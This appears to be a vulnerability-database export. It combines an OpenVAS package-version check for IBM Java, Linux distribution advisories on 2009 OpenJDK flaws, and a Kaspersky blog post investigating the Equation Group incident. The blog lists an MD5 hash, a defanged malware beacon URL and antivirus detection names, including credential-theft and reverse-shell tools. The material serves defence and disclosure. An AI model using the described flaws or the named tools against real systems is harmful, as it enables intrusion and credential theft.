script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"http://rhn.redhat.com/errata/RHSA-2009-1643.html\");\n script_xref(name : \"URL\" , value : \"http://www.redhat.com/security/updates/classification/#critical\");\n script_xref(name : \"URL\" , value : \"http://www.ibm.com/developerworks/java/jdk/alerts/\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"java-1.4.2-ibm\", rpm:\"java-1.4.2-ibm~1.4.2.13.3~1jpp.1.el3\", rls:\"RHENT_3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.4.2-ibm-demo\", rpm:\"java-1.4.2-ibm-demo~1.4.2.13.3~1jpp.1.el3\", rls:\"RHENT_3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.4.2-ibm-devel\", rpm:\"java-1.4.2-ibm-devel~1.4.2.13.3~1jpp.1.el3\", rls:\"RHENT_3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.4.2-ibm-jdbc\", rpm:\"java-1.4.2-ibm-jdbc~1.4.2.13.3~1jpp.1.el3\", rls:\"RHENT_3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.4.2-ibm-plugin\", rpm:\"java-1.4.2-ibm-plugin~1.4.2.13.3~1jpp.1.el3\", rls:\"RHENT_3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.4.2-ibm-src\", rpm:\"java-1.4.2-ibm-src~1.4.2.13.3~1jpp.1.el3\", rls:\"RHENT_3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.4.2-ibm\", rpm:\"java-1.4.2-ibm~1.4.2.13.3~1jpp.1.el4\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.4.2-ibm-demo\", rpm:\"java-1.4.2-ibm-demo~1.4.2.13.3~1jpp.1.el4\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.4.2-ibm-devel\", rpm:\"java-1.4.2-ibm-devel~1.4.2.13.3~1jpp.1.el4\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.4.2-ibm-javacomm\", rpm:\"java-1.4.2-ibm-javacomm~1.4.2.13.3~1jpp.1.el4\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.4.2-ibm-jdbc\", rpm:\"java-1.4.2-ibm-jdbc~1.4.2.13.3~1jpp.1.el4\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.4.2-ibm-plugin\", rpm:\"java-1.4.2-ibm-plugin~1.4.2.13.3~1jpp.1.el4\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.4.2-ibm-src\", rpm:\"java-1.4.2-ibm-src~1.4.2.13.3~1jpp.1.el4\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.4.2-ibm\", rpm:\"java-1.4.2-ibm~1.4.2.13.3~1jpp.1.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.4.2-ibm-demo\", rpm:\"java-1.4.2-ibm-demo~1.4.2.13.3~1jpp.1.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.4.2-ibm-devel\", rpm:\"java-1.4.2-ibm-devel~1.4.2.13.3~1jpp.1.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.4.2-ibm-javacomm\", rpm:\"java-1.4.2-ibm-javacomm~1.4.2.13.3~1jpp.1.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.4.2-ibm-jdbc\", rpm:\"java-1.4.2-ibm-jdbc~1.4.2.13.3~1jpp.1.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.4.2-ibm-plugin\", rpm:\"java-1.4.2-ibm-plugin~1.4.2.13.3~1jpp.1.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.4.2-ibm-src\", rpm:\"java-1.4.2-ibm-src~1.4.2.13.3~1jpp.1.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "oraclelinux": [{"lastseen": "2019-05-29T18:34:53", "bulletinFamily": "unix", "cvelist": ["CVE-2009-3880", "CVE-2009-3728", "CVE-2009-2409", "CVE-2009-3883", "CVE-2009-3876", "CVE-2009-3873", "CVE-2009-3879", "CVE-2009-3881", "CVE-2009-3882", "CVE-2009-3875", "CVE-2009-3869", "CVE-2009-3874", "CVE-2009-3871", "CVE-2009-3877", "CVE-2009-3884"], "description": "[1:1.6.0.0.0-1.7.b09.0.1.el5]\n- Add oracle-enterprise.patch\n[1:1.6.0-1.7.b09]\n- Fixed applying patches\n[1:1.6.0-1.6.b09]\n- Updated Release\n[1:1.6.0-1.5.b09]\n- Fixed Makefile patch\n[1:1.6.0-1.4.b09]\n- Updated release tag\n[1:1.6.0-1.3.b09]\n- Updated release ", "edition": 4, "modified": "2009-11-16T00:00:00", "published": "2009-11-16T00:00:00", "id": "ELSA-2009-1584", "href": "http://linux.oracle.com/errata/ELSA-2009-1584.html", "title": "java-1.6.0-openjdk security update", "type": "oraclelinux", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "centos": [{"lastseen": "2019-12-20T18:25:29", "bulletinFamily": "unix", "cvelist": ["CVE-2009-3880", "CVE-2009-3728", "CVE-2009-2409", "CVE-2009-3883", "CVE-2009-3876", "CVE-2009-3873", "CVE-2009-3879", "CVE-2009-3881", "CVE-2009-3882", "CVE-2009-3875", "CVE-2009-3869", "CVE-2009-3874", "CVE-2009-3871", "CVE-2009-3877", "CVE-2009-3884"], "description": "**CentOS Errata and Security Advisory** CESA-2009:1584\n\n\nThese packages provide the OpenJDK 6 Java Runtime Environment and the\nOpenJDK 6 Software Development Kit. The Java Runtime Environment (JRE)\ncontains the software and tools that users need to run applications written\nusing the Java programming language.\n\nAn integer overflow flaw and buffer overflow flaws were found in the way\nthe JRE processed image files. An untrusted applet or application could use\nthese flaws to extend its privileges, allowing it to read and write local\nfiles, as well as to execute local applications with the privileges of the\nuser running the applet or application. (CVE-2009-3869, CVE-2009-3871,\nCVE-2009-3873, CVE-2009-3874)\n\nAn information leak was found in the JRE. An untrusted applet or\napplication could use this flaw to extend its privileges, allowing it to\nread and write local files, as well as to execute local applications with\nthe privileges of the user running the applet or application. (CVE-2009-3881)\n\nIt was discovered that the JRE still accepts certificates with MD2 hash\nsignatures, even though MD2 is no longer considered a cryptographically\nstrong algorithm. This could make it easier for an attacker to create a\nmalicious certificate that would be treated as trusted by the JRE. With\nthis update, the JRE disables the use of the MD2 algorithm inside\nsignatures by default. (CVE-2009-2409)\n\nA timing attack flaw was found in the way the JRE processed HMAC digests.\nThis flaw could aid an attacker using forged digital signatures to bypass\nauthentication checks. (CVE-2009-3875)\n\nTwo denial of service flaws were found in the JRE. These could be exploited\nin server-side application scenarios that process DER-encoded\n(Distinguished Encoding Rules) data. (CVE-2009-3876, CVE-2009-3877)\n\nAn information leak was found in the way the JRE handled color profiles. An\nattacker could use this flaw to discover the existence of files outside of\nthe color profiles directory. (CVE-2009-3728)\n\nA flaw in the JRE with passing arrays to the X11GraphicsDevice API was\nfound. An untrusted applet or application could use this flaw to access and\nmodify the list of supported graphics configurations. This flaw could also\nlead to sensitive information being leaked to unprivileged code.\n(CVE-2009-3879)\n\nIt was discovered that the JRE passed entire objects to the logging API.\nThis could lead to sensitive information being leaked to either untrusted\nor lower-privileged code from an attacker-controlled applet which has\naccess to the logging API and is therefore able to manipulate (read and/or\ncall) the passed objects. (CVE-2009-3880)\n\nPotential information leaks were found in various mutable static variables.\nThese could be exploited in application scenarios that execute untrusted\nscripting code. (CVE-2009-3882, CVE-2009-3883)\n\nAn information leak was found in the way the TimeZone.getTimeZone method\nwas handled. This method could load time zone files that are outside of the\n[JRE_HOME]/lib/zi/ directory, allowing a remote attacker to probe the local\nfile system. (CVE-2009-3884)\n\nNote: The flaws concerning applets in this advisory, CVE-2009-3869,\nCVE-2009-3871, CVE-2009-3873, CVE-2009-3874, CVE-2009-3879, CVE-2009-3880,\nCVE-2009-3881 and CVE-2009-3884, can only be triggered in\njava-1.6.0-openjdk by calling the \"appletviewer\" application.\n\nAll users of java-1.6.0-openjdk are advised to upgrade to these updated\npackages, which resolve these issues. All running instances of OpenJDK Java\nmust be restarted for the update to take effect.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2009-November/028366.html\nhttp://lists.centos.org/pipermail/centos-announce/2009-November/028367.html\n\n**Affected packages:**\njava-1.6.0-openjdk\njava-1.6.0-openjdk-demo\njava-1.6.0-openjdk-devel\njava-1.6.0-openjdk-javadoc\njava-1.6.0-openjdk-src\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2009-1584.html", "edition": 3, "modified": "2009-11-18T10:19:03", "published": "2009-11-18T10:19:02", "href": "http://lists.centos.org/pipermail/centos-announce/2009-November/028366.html", "id": "CESA-2009:1584", "title": "java security update", "type": "centos", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "fedora": [{"lastseen": "2020-12-21T08:17:49", "bulletinFamily": "unix", "cvelist": ["CVE-2009-2409", "CVE-2009-3728", "CVE-2009-3869", "CVE-2009-3871", "CVE-2009-3873", "CVE-2009-3874", "CVE-2009-3875", "CVE-2009-3876", "CVE-2009-3877", "CVE-2009-3879", "CVE-2009-3880", "CVE-2009-3881", "CVE-2009-3882", "CVE-2009-3883", "CVE-2009-3884"], "description": "The OpenJDK runtime environment. ", "modified": "2009-11-14T03:30:20", "published": "2009-11-14T03:30:20", "id": "FEDORA:BD01E10F83E", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 11 Update: java-1.6.0-openjdk-1.6.0.0-30.b16.fc11", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:49", "bulletinFamily": "unix", "cvelist": ["CVE-2009-2409", "CVE-2009-3728", "CVE-2009-3869", "CVE-2009-3871", "CVE-2009-3873", "CVE-2009-3874", "CVE-2009-3875", "CVE-2009-3876", "CVE-2009-3877", "CVE-2009-3879", "CVE-2009-3880", "CVE-2009-3881", "CVE-2009-3882", "CVE-2009-3883", "CVE-2009-3884"], "description": "The OpenJDK runtime environment. ", "modified": "2009-11-14T03:33:25", "published": "2009-11-14T03:33:25", "id": "FEDORA:1C6D410F83E", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 10 Update: java-1.6.0-openjdk-1.6.0.0-23.b16.fc10", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:49", "bulletinFamily": "unix", "cvelist": ["CVE-2009-2409", "CVE-2009-3728", "CVE-2009-3869", "CVE-2009-3871", "CVE-2009-3873", "CVE-2009-3874", "CVE-2009-3875", "CVE-2009-3876", "CVE-2009-3877", "CVE-2009-3879", "CVE-2009-3880", "CVE-2009-3881", "CVE-2009-3882", "CVE-2009-3883", "CVE-2009-3884"], "description": "The OpenJDK runtime environment. ", "modified": "2009-11-14T03:32:17", "published": "2009-11-14T03:32:17", "id": "FEDORA:9A32710F7FF", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 12 Update: java-1.6.0-openjdk-1.6.0.0-33.b16.fc12", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "ubuntu": [{"lastseen": "2020-07-09T00:25:48", "bulletinFamily": "unix", "cvelist": ["CVE-2009-3880", "CVE-2009-3728", "CVE-2009-2409", "CVE-2009-3883", "CVE-2009-3876", "CVE-2009-3873", "CVE-2009-3879", "CVE-2009-3881", "CVE-2009-3882", "CVE-2009-3875", "CVE-2009-3869", "CVE-2009-3885", "CVE-2009-3874", "CVE-2009-3871", "CVE-2009-3877", "CVE-2009-3884"], "description": "Dan Kaminsky discovered that SSL certificates signed with MD2 could be \nspoofed given enough time. As a result, an attacker could potentially \ncreate a malicious trusted certificate to impersonate another site. This \nupdate handles this issue by completely disabling MD2 for certificate \nvalidation in OpenJDK. (CVE-2009-2409)\n\nIt was discovered that ICC profiles could be identified with \n\"..\" pathnames. If a user were tricked into running a specially \ncrafted applet, a remote attacker could gain information about a local \nsystem. (CVE-2009-3728)\n\nPeter Vreugdenhil discovered multiple flaws in the processing of graphics \nin the AWT library. If a user were tricked into running a specially \ncrafted applet, a remote attacker could crash the application or run \narbitrary code with user privileges. (CVE-2009-3869, CVE-2009-3871)\n\nMultiple flaws were discovered in JPEG and BMP image handling. If a user \nwere tricked into loading a specially crafted image, a remote attacker \ncould crash the application or run arbitrary code with user privileges. \n(CVE-2009-3873, CVE-2009-3874, CVE-2009-3885)\n\nCoda Hale discovered that HMAC-based signatures were not correctly \nvalidated. Remote attackers could bypass certain forms of authentication, \ngranting unexpected access. (CVE-2009-3875)\n\nMultiple flaws were discovered in ASN.1 parsing. A remote attacker \ncould send a specially crafted HTTP stream that would exhaust system \nmemory and lead to a denial of service. (CVE-2009-3876, CVE-2009-3877)\n\nIt was discovered that the graphics configuration subsystem did \nnot correctly handle arrays. If a user were tricked into running \na specially crafted applet, a remote attacker could exploit this \nto crash the application or execute arbitrary code with user \nprivileges. (CVE-2009-3879)\n\nIt was discovered that loggers and Swing did not correctly handle \ncertain sensitive objects. If a user were tricked into running a \nspecially crafted applet, private information could be leaked to a remote \nattacker, leading to a loss of privacy. (CVE-2009-3880, CVE-2009-3882, \nCVE-2009-3883)\n\nIt was discovered that the ClassLoader did not correctly handle certain \noptions. If a user were tricked into running a specially crafted \napplet, a remote attacker could execute arbitrary code with user \nprivileges. (CVE-2009-3881)\n\nIt was discovered that time zone file loading could be used to determine \nthe existence of files on the local system. If a user were tricked into \nrunning a specially crafted applet, private information could be leaked \nto a remote attacker, leading to a loss of privacy. (CVE-2009-3884)", "edition": 5, "modified": "2009-11-12T00:00:00", "published": "2009-11-12T00:00:00", "id": "USN-859-1", "href": "https://ubuntu.com/security/notices/USN-859-1", "title": "OpenJDK vulnerabilities", "type": "ubuntu", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "securelist": [{"lastseen": "2017-11-27T08:03:02", "bulletinFamily": "blog", "cvelist": ["CVE-2009-3869", "CVE-2010-0094", "CVE-2010-0188", "CVE-2010-0480", "CVE-2010-0840", "CVE-2010-0842", "CVE-2010-1297", "CVE-2010-3563", "CVE-2010-3653", "CVE-2010-3654", "CVE-2011-0609", "CVE-2011-0611", "CVE-2011-3400", "CVE-2011-3544", "CVE-2012-0507", "CVE-2012-0754", "CVE-2012-1723", "CVE-2012-4681", "CVE-2013-0422", "CVE-2013-0431", "CVE-2013-2171", "CVE-2013-2423"], "description": "\n\n## Background\n\nIn early October, a story was published by the Wall Street Journal alleging Kaspersky Lab software was used to siphon classified data from an NSA employee's home computer system. Given that Kaspersky Lab has been at the forefront of fighting cyberespionage and cybercriminal activities on the Internet for over 20 years now, these allegations were treated very seriously. To assist any independent investigators and all the people who have been asking us questions whether those allegations were true, we decided to conduct an internal investigation to attempt to answer a few questions we had related to the article and some others that followed it:\n\n 1. Was our software used outside of its intended functionality to pull classified information from a person's computer?\n 2. When did this incident occur?\n 3. Who was this person?\n 4. Was there actually classified information found on the system inadvertently?\n 5. If classified information was pulled back, what happened to said data after? Was it handled appropriately?\n 6. Why was the data pulled back in the first place? Is the evidence this information was passed on to \"Russian Hackers\" or Russian intelligence?\n 7. What types of files were gathered from the supposed system?\n 8. Do we have any indication the user was subsequently \"hacked\" by Russian hackers and data exfiltrated?\n 9. Could Kaspersky Lab products be secretly used to intentionally siphon sensitive data unrelated to malware from customers' computers?\n 10. Assuming cyberspies were able to see the screens of our analysts, what could they find on it and how could that be interpreted?\n\nAnswering these questions with factual information would allow us to provide reasonable materials to the media, as well as show hard evidence on what exactly did or did not occur, which may serve as a food for thought to everyone else. To further support the objectivity of the internal investigation we ran our investigation using multiple analysts of non-Russian origin and working outside of Russia to avoid even potential accusations of influence.\n\n## The Wall Street Journal Article\n\nThe article published in October laid out some specifics that need to be documented and fact checked. Important bullet points from the article include:\n\n * The information \"stolen\" provides details on how the U.S. penetrates foreign computer networks and defends against cyberattacks.\n * A National Security Agency contractor removed the highly classified material and put it on his home computer.\n * The data ended up in the hands of so called \"Russian hackers\" after the files were detected using Kaspersky Lab software.\n * The incident occurred in 2015 but wasn't discovered until spring of last year [2016].\n * The Kaspersky Lab linked incident predates the arrest last year of another NSA contractor, Harold Martin.\n * \"Hackers\" homed in on the machine and stole a large amount of data after seeing what files were detected using Kaspersky data.\n\n## Beginning of Search\n\nHaving all of the data above, the first step in trying to answer these questions was to attempt to identify the supposed incident. Since events such as what is outlined above only occur very rarely, and we diligently keep the history of all operations, it should be possible to find them in our telemetry archive given the right search parameters.\n\nThe first assumption we made during the search is that whatever data was allegedly taken, most likely had to do with the so-called Equation Group, since this was the major research in active stage during the time of alleged incident as well as many existing links between Equation Group and NSA highlighted by the media and some security researchers. Our Equation signatures are clearly identifiable based on the malware family names, which contain words including \"Equestre\", \"Equation\", \"Grayfish\", \"Fanny\", \"DoubleFantasy\" given to different tools inside the intrusion set. Taking this into account, we began running searches in our databases dating back to June 2014 (6 months prior to the year the incident allegedly happened) for all alerts triggered containing wildcards such as \"HEUR:Trojan.Win32.Equestre.*\". Results showed quickly: we had a few test (silent) signatures in place that produced a LARGE amount of false positives. This is not something unusual in the process of creating quality signatures for a rare piece of malware. To alleviate this, we sorted results by count of unique hits and quickly were able to zoom in on some activity that happened in September 2014. It should be noted that this date is technically not within the year that the incident supposedly happened, but we wanted to be sure to cover all bases, as journalists and sources sometimes don't have all the details.\n\nBelow is a list of all hits in September for an \"Equestre\" signature, sorted by least amount to most. You can quickly identify the problem signature(s) mentioned above.\n\nDetection name (silent) | Count \n---|--- \nHEUR:Trojan.Win32.Equestre.u | 1 \nHEUR:Trojan.Win32.Equestre.gen.422674 | 3 \nHEUR:Trojan.Win32.Equestre.gen.422683 | 3 \nHEUR:Trojan.Win32.Equestre.gen.427692 | 3 \nHEUR:Trojan.Win32.Equestre.gen.427696 | 4 \nHEUR:Trojan.Win32.Equestre.gen.446160 | 6 \nHEUR:Trojan.Win32.Equestre.gen.446979 | 7 \nHEUR:Trojan.Win32.Equestre.g | 8 \nHEUR:Trojan.Win32.Equestre.ab | 9 \nHEUR:Trojan.Win32.Equestre.y | 9 \nHEUR:Trojan.Win32.Equestre.l | 9 \nHEUR:Trojan.Win32.Equestre.ad | 9 \nHEUR:Trojan.Win32.Equestre.t | 9 \nHEUR:Trojan.Win32.Equestre.e | 10 \nHEUR:Trojan.Win32.Equestre.v | 14 \nHEUR:Trojan.Win32.Equestre.gen.427697 | 18 \nHEUR:Trojan.Win32.Equestre.gen.424814 | 18 \nHEUR:Trojan.Win32.Equestre.s | 19 \nHEUR:Trojan.Win32.Equestre.x | 20 \nHEUR:Trojan.Win32.Equestre.i | 24 \nHEUR:Trojan.Win32.Equestre.p | 24 \nHEUR:Trojan.Win32.Equestre.q | 24 \nHEUR:Trojan.Win32.Equestre.gen.446142 | 34 \nHEUR:Trojan.Win32.Equestre.d | 39 \nHEUR:Trojan.Win32.Equestre.j | 40 \nHEUR:Trojan.Win32.Equestre.gen.427734 | 53 \nHEUR:Trojan.Win32.Equestre.gen.446149 | 66 \nHEUR:Trojan.Win32.Equestre.ag | 142 \nHEUR:Trojan.Win32.Equestre.b | 145 \nHEUR:Trojan.Win32.Equestre.h | 310 \nHEUR:Trojan.Win32.Equestre.gen.422682 | 737 \nHEUR:Trojan.Win32.Equestre.z | 1389 \nHEUR:Trojan.Win32.Equestre.af | 2733 \nHEUR:Trojan.Win32.Equestre.c | 3792 \nHEUR:Trojan.Win32.Equestre.m | 4061 \nHEUR:Trojan.Win32.Equestre.k | 6720 \nHEUR:Trojan.Win32.Equestre.exvf.1 | 6726 \nHEUR:Trojan.Win32.Equestre.w | 6742 \nHEUR:Trojan.Win32.Equestre.f | 9494 \nHEUR:Trojan.Win32.Equestre.gen.446131 | 26329 \nHEUR:Trojan.Win32.Equestre.aa | 87527 \nHEUR:Trojan.Win32.Equestre.gen.447002 | 547349 \nHEUR:Trojan.Win32.Equestre.gen.447013 | 1472919 \n \nTaking this list of alerts, we started at the top and worked our way down, investigating each hit as we went trying to see if there were any indications it may be related to the incident. Most hits were what you would think: victims of Equation or false positives. Eventually we arrived at a signature that fired a large number of times in a short time span on one system, specifically the signature \"HEUR:Trojan.Win32.Equestre.m\" and a 7zip archive (referred below as \"[undisclosed].7z\"). Given limited understanding of Equation at the time of research it could have told our analysts that an archive file firing on these signatures was an anomaly, so we decided to dig further into the alerts on this system to see what might be going on. After analyzing the alerts, it was quickly realized that this system contained not only this archive, but many files both common and unknown that indicated this was probably a person related to the malware development. Below is a list of Equation specific signatures that fired on this system over a period of approximately three months:\n\nHEUR:Trojan.Win32.Equestre.e \nHEUR:Trojan.Win32.Equestre.exvf.1 \nHEUR:Trojan.Win32.Equestre.g \nHEUR:Trojan.Win32.Equestre.gen.424814 \nHEUR:Trojan.Win32.Equestre.gen.427693 \nHEUR:Trojan.Win32.Equestre.gen.427696 \nHEUR:Trojan.Win32.Equestre.gen.427697 \nHEUR:Trojan.Win32.Equestre.gen.427734 \nHEUR:Trojan.Win32.Equestre.gen.446142 \nHEUR:Trojan.Win32.Equestre.gen.446993 \nHEUR:Trojan.Win32.Equestre.gen.465795 \nHEUR:Trojan.Win32.Equestre.i \nHEUR:Trojan.Win32.Equestre.j \nHEUR:Trojan.Win32.Equestre.m \nHEUR:Trojan.Win32.Equestre.p \nHEUR:Trojan.Win32.Equestre.q \nHEUR:Trojan.Win32.Equestre.x \nHEUR:Trojan.Win32.GrayFish.e \nHEUR:Trojan.Win32.GrayFish.f\n\nIn total we detected 37 unique files and 218 detected objects, including executables and archives containing malware associated with the Equation Group. Looking at this metadata during current investigation we were tempted to include the full list of detected files and file paths into current report, however, according to our ethical standards, as well as internal policies, we cannot violate our users' privacy. This was a hard decision, but should we make an exception once, even for the sake of protecting our own company's reputation, that would be a step on the route of giving up privacy and freedom of all people who rely on our products. Unless we receive a legitimate request originating from the owner of that system or a higher legal authority, we cannot release such information.\n\nThe file paths observed from these detections indicated that a developer of Equation had plugged in one or more removable drives, AV signatures fired on some of executables as well as archives containing them, and any files detected (including archives they were contained within) were automatically pulled back. At this point in time, we felt confident we had found the source of the story fed to Wall Street Journal and others. Since this type of event clearly does not happen often, we believe some dates were mixed up or not clear from the original source of the leak to the media.\n\nOur next task was to try and answer what may have happened to the data that was pulled back. Clearly an archive does not contain only those files that triggered, and more than likely contained a possible treasure trove of data pertaining to the intrusion set. It was soon discovered that the actual archive files themselves appear to have been removed from our storage of samples, while the individual files that triggered the alerts remained.\n\nUpon further inquiring about this event and missing files, it was later discovered that at the direction of the CEO, the archive file, named \"[undisclosed].7z\" was removed from storage. Based on description from the analyst working on that archive, it contained a collection of executable modules, four documents bearing classification markings, and other files related to the same project. The reason we deleted those files and will delete similar ones in the future is two-fold; We don't need anything other than malware binaries to improve protection of our customers and secondly, because of concerns regarding the handling of potential classified materials. Assuming that the markings were real, such information cannot and will not consumed even to produce detection signatures based on descriptions.\n\nThis concern was later translated into a policy for all malware analysts which are required to delete any potential classified materials that have been accidentally collected during anti-malware research or received from a third party. Again to restate: to the best of our knowledge, it appears the archive files and documents were removed from our storage, and only individual executable files (malware) that were already detected by our signatures were left in storage. Also, it is very apparent that no documents were actively \"detected on\" during this process. In other words, the only files that fired on specific Equation signatures were binaries, contained within an archive or outside of it. The documents were inadvertently pulled back because they were contained within the larger archive file that alerted on many Equation signatures. According to security software industry standards, requesting a copy of an archive containing malware is a legitimate request, which often helps security companies locate data containers used by malware droppers (i.e. they can be self-extracting archives or even infected ISO files).\n\n## An Interesting Twist\n\nDuring the investigation, we also discovered a very interesting twist to the story that has not been discussed publicly to our knowledge. Since we were attempting to be as thorough as possible, we analyzed EVERY alert ever triggered for the specific system in question and came to a very interesting conclusion. It appears the system was actually compromised by a malicious actor on October 4, 2014 at 23:38 local time, specifically by a piece of malware hidden inside a malicious MS Office ISO, specifically the \"setup.exe\" file (md5: a82c0575f214bdc7c8ef5a06116cd2a4 - for [detection coverage, see this VirusTotal link](<https://www.virustotal.com/#/file/6bcd591540dce8e0cef7b2dc6a378a10d79f94c3217bca5f05db3c24c2036340/detection>)) .\n\nLooking at the sequence of events and detections on this system, we quickly noticed that the user in question ran the above file with a folder name of \"Office-2013-PPVL-x64-en-US-Oct2013.iso\". What is interesting is that this ISO file is malicious and was mounted and subsequently installed on the system along with files such as \"kms.exe\" (a name of a popular pirated software activation tool), and \"kms.activator.for.microsoft.windows.8.server.2012.and.office.2013.all.editions\". Kaspersky Lab products detected the malware with the verdict **Backdoor.Win32.Mokes.hvl**.\n\nAt a later time after installation of the supposed MS Office 2013, the antivirus began blocking connections out on a regular basis to the URL \"http://xvidmovies[.]in/dir/index.php\". Looking into this domain, we can quickly find other malicious files that beacon to the same URL. It's important to note that the reason we know the system was beaconing to this URL is because we were actively blocking it as it was a known bad site. This does however indicate the user actively downloaded / installed malware on the same system around the same time frame as our detections on the Equation files.\n\nTo install and run this malware, the user must have disabled Kaspersky Lab products on his machine. Our telemetry does not allow us to say when the antivirus was disabled, however, the fact that the malware was later detected as running in the system suggests the antivirus had been disabled or was not running when the malware was run. **Executing the malware would not have been possible with the antivirus enabled**.\n\nAdditionally, there also may have been other malware from different downloads that we were unaware of during this time frame. Below is a complete list of the 121 non-Equation specific alerts seen on this system over the two month time span:\n\nBackdoor.OSX.Getshell.k \nBackdoor.Win32.Mokes.hvl \nBackdoor.Win32.Shiz.gpmv \nBackdoor.Win32.Swrort.dbq \nDangerousObject.Multi.Chupitio.a \nExploit.Java.Agent.f \nExploit.Java.CVE-2009-3869.a \nExploit.Java.CVE-2010-0094.bb \nExploit.Java.CVE-2010-0094.e \nExploit.Java.CVE-2010-0094.q \nExploit.Java.CVE-2010-0840.gm \nExploit.Java.CVE-2010-0842.d \nExploit.Java.CVE-2010-3563.a \nExploit.Java.CVE-2011-3544.ac \nExploit.Java.CVE-2012-0507.al \nExploit.Java.CVE-2012-0507.je \nExploit.Java.CVE-2012-1723.ad \nExploit.Java.CVE-2012-4681.l \nExploit.JS.Aurora.a \nExploit.MSVisio.CVE-2011-3400.a \nExploit.Multi.CVE-2012-0754.a \nExploit.OSX.Smid.b \nExploit.SWF.CVE-2010-1297.c \nExploit.SWF.CVE-2011-0609.c \nExploit.SWF.CVE-2011-0611.ae \nExploit.SWF.CVE-2011-0611.cd \nExploit.Win32.CVE-2010-0188.a \nExploit.Win32.CVE-2010-0480.a \nExploit.Win32.CVE-2010-3653.a \nExploit.Win32.CVE-2010-3654.a \nHackTool.Win32.Agent.vhs \nHackTool.Win32.PWDump.a \nHackTool.Win32.WinCred.e \nHackTool.Win32.WinCred.i \nHackTool.Win64.Agent.b \nHackTool.Win64.WinCred.a \nHackTool.Win64.WinCred.c \nHEUR:Exploit.FreeBSD.CVE-2013-2171.a \nHEUR:Exploit.Java.CVE-2012-1723.gen \nHEUR:Exploit.Java.CVE-2013-0422.gen \nHEUR:Exploit.Java.CVE-2013-0431.gen \nHEUR:Exploit.Java.CVE-2013-2423.gen \nHEUR:Exploit.Java.Generic \nHEUR:Exploit.Script.Generic \nHEUR:HackTool.AndroidOS.Revtcp.a \nHEUR:Trojan-Downloader.Script.Generic \nHEUR:Trojan-FakeAV.Win32.Onescan.gen \nHEUR:Trojan.Java.Generic \nHEUR:Trojan.Script.Generic \nHEUR:Trojan.Win32.Generic \nHoax.Win32.ArchSMS.cbzph \nKHSE:Exploit.PDF.Generic.a \nnot-a-virus:AdWare.JS.MultiPlug.z \nnot-a-virus:AdWare.NSIS.Agent.bx \nnot-a-virus:AdWare.Win32.Agent.allm \nnot-a-virus:AdWare.Win32.AirAdInstaller.cdgd \nnot-a-virus:AdWare.Win32.AirAdInstaller.emlr \nnot-a-virus:AdWare.Win32.Amonetize.fay \nnot-a-virus:AdWare.Win32.DomaIQ.cjw \nnot-a-virus:AdWare.Win32.Fiseria.t \nnot-a-virus:AdWare.Win32.iBryte.jda \nnot-a-virus:AdWare.Win32.Inffinity.yas \nnot-a-virus:AdWare.Win32.MultiPlug.nbjr 